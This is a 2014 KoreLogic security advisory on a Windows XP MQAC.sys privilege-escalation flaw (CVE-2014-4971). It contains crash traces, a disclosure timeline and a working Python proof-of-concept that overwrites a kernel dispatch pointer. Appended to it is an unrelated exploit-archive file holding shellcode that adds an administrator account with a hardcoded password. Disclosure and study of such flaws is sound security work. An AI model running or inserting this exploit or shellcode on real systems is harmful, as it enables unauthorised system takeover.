Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971
2. Vulnerability Description
A vulnerability within the MQAC module allows an attacker to
inject memory they control into an arbitrary location they
define. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently
calling NtQueryIntervalProfile.
3. Technical Description
A userland process can create a handle into the MQAC device and
subsequently make DeviceIoControlFile() calls into that device.
During the IRP handler routine for 0x1965020f the user provided
OutputBuffer address is not validated. This allows an attacker
to specify an arbitrary address and write (or overwrite) the
memory residing at the specified address. This is classically
known as a write-what-where vulnerability and has well known
exploitation methods associated with it.
A stack trace from our fuzzing can be seen below. In our
fuzzing testcase, the specified OutputBuffer in the
DeviceIoControlFile() call is 0xffff0000.
STACK_TEXT:
b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
command shows the fault originating in the mqac driver.
OLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e mov dword ptr [esi],ebx
Reviewing the TRAP_FRAME at the time of crash we can see
IopCompleteRequest() copying data from InputBuffer into the
OutputBuffer. InputBuffer is another parameter provided to the
DeviceIoControlFile() function and is therefore controllable by
the attacker. The edi register contains the invalid address
provided during the fuzz testcase.
TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)
ErrCode = 00000002
eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????
A write-what-where vulnerability can be leveraged to obtain
escalated privileges. To do so, an attacker will need to
allocate memory in userland that is populated with shellcode
designed to find the Token for PID 4 (System) and then overwrite
the token for its own process. By leveraging the vulnerability
in MQAC it is then possible to overwrite the pointer at
HalDispatchTable+0x4 with a pointer to our shellcode. Calling
NtQueryIntervalProfile() will subsequently call
HalDispatchTable+0x4, execute our shellcode, and elevate the
privilege of the exploit process.
4. Mitigation and Remediation Recommendation
None. A patch is not likely to be forthcoming from the vendor.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability
report; states XP is no longer supported and asks if
the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their
support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be
addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the
vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the
vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects
non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability
report is for XP and other Windows versions have
not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days
have passed since vendor acknowledgement of the
initial report. KoreLogic requests CVE number for the
vulnerability, if there is one. KoreLogic also
requests vendor's public identifier for the
vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft responds to KoreLogic that the
vulnerability does not affect an "up-platform"
product. Says they are investigating embedded
platforms. Does not provide a CVE number or a
disclosure date.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their
receipt of the updated PoC. Also requests that
a CVE ID be issued to this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report and
PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to
be identical to KL-001-2014-002 and issues
CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.
7. Proof of Concept
#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them :)
def getBase(name=None):
retArray = c_ulong*1024
ImageBase = retArray()
callback = c_int(1024)
cbNeeded = c_long()
EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
for base in ImageBase:
driverName = c_char_p("\x00"*1024)
GetDeviceDriverBaseNameA(base,driverName,48)
if (name):
if (driverName.value.lower() == name):
return base
else:
return (base,driverName.value)
return None
handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)
The contents of this advisory are copyright(c) 2014
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

27
platforms/windows/shellcode/33836.txt Executable file
View file

@ -0,0 +1,27 @@
Add Admin User Shellcode (194 bytes) - Any Windows Version
========================================================
Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Release date: 21/06/2014
Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
Size: 194 byte (NULL free)
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}